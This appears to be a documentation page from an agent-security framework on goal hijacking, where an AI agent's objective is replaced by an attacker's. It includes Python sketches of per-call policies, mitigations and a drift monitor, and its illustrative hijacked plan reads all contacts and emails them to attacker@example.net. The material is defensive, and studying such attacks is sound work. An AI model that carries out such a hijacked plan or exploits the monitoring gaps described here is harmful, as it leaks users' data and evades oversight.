Overview
Goal hijacking occurs when an agent’s working objective changes from the user’s task to an attacker-controlled or otherwise illegitimate objective. Unlike prompt injection, which often focuses on a specific instruction, goal hijacking changes the planning target itself.
Why It Is Dangerous
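- downstream actions can still look coherent, because each step is consistent with the hijacked goal
- ordinary per-call tool policies may not catch the shift immediately, since a hijacked plan can be assembled entirely from individually permitted calls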
- the agent may re-plan multiple steps around the hijacked goal
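To make the per-call policy gap concrete, here is a minimal sketch. It assumes a hypothetical policy that only checks each tool call against an allowlist; the `ToolCall` type, the tool names, and both plans are invented for illustration and are not part of AARM.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolCall:
    tool: str    # hypothetical "family.verb" tool name
    target: str  # resource or recipient the call touches


# Hypothetical per-call policy: every call is judged in isolation.
ALLOWED_TOOLS = {"email.read", "email.send", "contacts.read"}


def per_call_policy(call: ToolCall) -> bool:
    """Allow any call whose tool is allowlisted, ignoring the overall goal."""
    return call.tool in ALLOWED_TOOLS


# User task: "Summarize my unread email."
legitimate_plan = [
    ToolCall("email.read", "inbox/unread"),
    ToolCall("email.send", "user@example.com"),  # deliver the summary to the user
]

# After a hijack: the same allowlisted tools, but the plan now exfiltrates contacts.
hijacked_plan = [
    ToolCall("email.read", "inbox/unread"),
    ToolCall("contacts.read", "all"),
    ToolCall("email.send", "attacker@example.net"),
]


def plan_passes(plan: list[ToolCall]) -> bool:
    """A plan passes if every individual call passes the per-call policy."""
    return all(per_call_policy(call) for call in plan)


if __name__ == "__main__":
    print("legitimate plan passes:", plan_passes(legitimate_plan))
    print("hijacked plan passes:", plan_passes(hijacked_plan))
```

Both plans pass. Nothing in a single call reveals the substitution; it only becomes visible when the sequence of calls is compared against the original request.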
AARM Mitigations
Original-intent binding
Keep the original request available, unmodified, as an invariant reference against which later actions are evaluated.
Semantic distance checks
Compare the purpose of the current action against the initial task or declared workflow goal.
Scope boundaries
Restrict action families that do not fit the authorized task type; for example, an email summarization task has no need for bulk data export.
Detection Signals
| Signal | Indicates |
|---|---|
| Sudden tool-family change | Planning objective may have shifted |
| New objective language in agent state | Agent may be restating the goal in attacker-supplied terms |
| Rising semantic distance | Current actions no longer align with the original request |
| Resource access outside declared task | Goal expansion or replacement |
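The mitigations and detection signals above can be combined into a per-action check. The sketch below is a minimal illustration under stated assumptions, not AARM's implementation: `OriginalIntent`, `GoalHijackMonitor`, `TASK_SCOPES`, the `family.verb` tool naming, and the 0.8 distance threshold are all hypothetical, and a bag-of-words cosine distance stands in for the embedding model a real deployment would more likely use. The "new objective language" signal is not modeled.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass

# Hypothetical scope boundaries: tool families each task type may use.
TASK_SCOPES: dict[str, frozenset[str]] = {
    "summarize_email": frozenset({"email"}),
}


@dataclass(frozen=True)
class OriginalIntent:
    """Original-intent binding: captured once at session start, never mutated."""
    task_type: str
    request: str
    declared_resources: frozenset[str]


def _bag_of_words(text: str) -> Counter:
    return Counter(re.findall(r"[a-z]+", text.lower()))


def semantic_distance(a: str, b: str) -> float:
    """1 - cosine similarity of word counts (a crude stand-in for embeddings)."""
    va, vb = _bag_of_words(a), _bag_of_words(b)
    dot = sum(count * vb[word] for word, count in va.items())
    norm = math.sqrt(sum(c * c for c in va.values())) * math.sqrt(sum(c * c for c in vb.values()))
    return 1.0 if norm == 0 else 1.0 - dot / norm


class GoalHijackMonitor:
    """Evaluates each proposed action against the bound original intent."""

    def __init__(self, intent: OriginalIntent, distance_threshold: float = 0.8) -> None:
        self.intent = intent
        self.threshold = distance_threshold
        self.prev_family = None  # tool family of the previous action, if any
        self.distances = []      # semantic distance of each action so far

    def check(self, tool: str, purpose: str, resource: str) -> list[str]:
        """Return the names of the signals raised by one proposed action."""
        signals = []
        family = tool.split(".", 1)[0]
        # Sudden tool-family change relative to the previous action.
        if self.prev_family is not None and family != self.prev_family:
            signals.append("tool_family_change")
        # Scope boundary: family not authorized for this task type.
        if family not in TASK_SCOPES.get(self.intent.task_type, frozenset()):
            signals.append("out_of_scope_family")
        # Distance above threshold and higher than for the previous action.
        distance = semantic_distance(self.intent.request, purpose)
        if distance > self.threshold and (not self.distances or distance > self.distances[-1]):
            signals.append("rising_semantic_distance")
        # Resource access outside the resources declared for the task.
        if resource not in self.intent.declared_resources:
            signals.append("undeclared_resource")
        self.prev_family = family
        self.distances.append(distance)
        return signals


if __name__ == "__main__":
    intent = OriginalIntent("summarize_email", "Summarize my unread email", frozenset({"inbox/unread"}))
    monitor = GoalHijackMonitor(intent)
    print(monitor.check("email.read", "read unread email to summarize", "inbox/unread"))
    # → []
    print(monitor.check("contacts.read", "export all contacts for the new objective", "contacts/all"))
    # → ['tool_family_change', 'out_of_scope_family', 'rising_semantic_distance', 'undeclared_resource']
```

Because `OriginalIntent` is frozen and built once, later steps cannot rewrite the reference they are measured against. How raised signals map to a decision (deny, step-up approval, or log only) is a policy choice this sketch leaves open.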
Key Takeaway
Goal hijacking is about objective substitution. AARM mitigates it by treating original task alignment as a runtime security boundary, not a prompt-engineering convenience.
Next
- Intent Drift: how benign-looking reasoning can still diverge over time
- Context Accumulator: how to preserve the original task for later comparison